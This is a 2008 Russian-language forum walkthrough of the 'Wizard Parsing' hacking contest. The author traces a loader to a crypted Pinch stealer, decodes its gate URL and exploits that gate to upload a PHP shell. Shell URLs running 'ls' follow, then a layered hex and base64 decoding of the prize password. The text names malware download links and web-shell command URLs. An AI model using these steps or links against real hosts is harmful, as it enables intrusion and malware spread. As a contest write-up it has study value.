Текст квеста:
Рад представить вашему вниманию "Wizard Parsing" конкурс, первый кто пройдет получит денежный приз. Все вопросы и обсуждения ведем в этом топе. Халявщики проходим мимо , дайте ребятам попробовать ((= START http://room-art.info/START.exe
Как видим по линку расположен подозрительный ехе, проверив его на виртотле видим что это лоадер следовательно он что-то льёт\кудато ломицо. Открыв его и посмотрев снифером куда он конектится видим:
Request: GET /cooks.exe http://exploit-p-co.hut2.ru/cooks.exe
К сожалению лоадеру слить данный файл не удалось, у меня то же не с первого раза вышло (ох уж эти бесплатные хостеры).
Скачав файл через донлоад менеджер (через браузер не вышло), я открыл его сразу в WinHex'е )) Было видно что это прокриптованный пинч, но данные по хосту остались не тронуты, т.е.:
Wlhod2JHOXBkQzF3TFdOdkxtaDFkREl1Y25VPQ== POST /admin.php
Расшифровав поле хоста получаем exploit-p-co.hut2.ru а именно линк exploit-p-co.hut2.ru/admin.php Перейдя по линку было ясно что это изменённый гейт пинча, который выдовал "error 666".
Сразу пришла мысль задействовать модифицированный сплоит для гейта, увы нечего не вышло... Далее последовала идея применить такой же сплоит но уже на перле, тож нечего хорошего...
Так как нечего не получалось, появилась мысль захекать весь серв хостера) Для этого нашёл фтп который находится на том же серве что и домен с квестом и начал искать баги... Опять же нечего хорошего не вышло....
Подумав что это проблема хоста, я поставил на фтп гейт от пинча и решил протестить сплоит уже на моём гейте, как оказалось гейт сохраняет отчёты не с моим Ипом, следовательно сплоит просто не мог получить IP, но я то уже его знал)) по этому подправив сплоит:
$ip = '89.108.**.**' ;
Я запустил его на выплнение и о чудо простейший РНР шел залился) (я уже думал что квест законцен, а вот и нет)..... Далее найдя путь до шела: http://exploit-p-co.hut2.ru/10_15-24.05.2008_89.108.**.**_.php
Решили просмареть файлы которые лежат в дире с шелом: http://exploit-p-co.hut2.ru/10_15-24.05.2008_89.108.**.**_.php?q=ls Там лежали следующие файлы:
10_15-24.05.2008_89.108.**.**_.php - наш шел 333 - как оказалось это уже r57 шел который можно было проинклюдить admin.php - гейт от пинча cooks.exe - сам пинч flash.swf - флешка flash.txt - текст для флешки) index.htm - индекс (там я отписал приветы ^^) prizz - и вот она чудо папка
По началу я подумал что квест окончен))) что зайду в диру prizz и там меня ждёт куча 0дэя, а вот и нет: http://exploit-p-co.hut2.ru/10_15-24.05.2008_89.108.**.**_.php?q=ls /home/e/exploit-p-co.hut2.ru/WWW/prizz Где лежали 2 файла:
password.txt
prizz.zip
Скачав оба файла, я просмотрел password.txt:
%25%33%35%25%33%35%25%33%36%25%34%34%25%33%33%25%33%31%25%33%36%25%34%36%25 %33%36%25%33%32%25%33%36%25%34%32%25%33%37%25%33%30%25%33%35%25%33%34%25%33 %36%25%33%33%25%33%34%25%33%37%25%33%33%25%33%39%25%33%36%25%33%31%25%33%34 %25%34%34%25%33%36%25%34%35%25%33%35%25%33%32%25%33%37%25%33%38%25%33%35%25 %33%35%25%33%34%25%33%36%25%33%36%25%33%33%25%33%33%25%33%39%25%33%35%25%33 %30%25%33%35%25%33%36%25%33%33%25%34%34%25%33%33%25%34%34%0D%0A
Подумав что вдруг возможно это и есть пас - я попытался его скормить архиву, увы .... Визуально было ясно что между % hex значения, попытавшись расшифровать получаем:
%35%35%36%44%33%31%36%46%36%32%36%42%37%30%35%34%36%33%34%37%33%39%36%31%34 %44%36%45%35%32%37%38%35%35%34%36%36%33%33%39%35%30%35%36%33%44%33%44
Опять hex) расшифровываем далее:
556D316F626B7054634739614D6E52785546633950563D3D
Да что такое) опять hex) далее:
Um1obkpTcG9aMnRxUFc9PV==
Вот оно чудо)) всем известный base64) расшифровываем его:
RmhnJSpoZ2tqPW==
Эм... опять base64, далее:
Fhg%*hgkj=
Опа!! А это уже и есть сам пароль на архив:
Поздравляю ты прошел конкурс Wizard Parsing , теперь тебе осталось отписать key"
© St. 24.05.2008
мутный квэст =/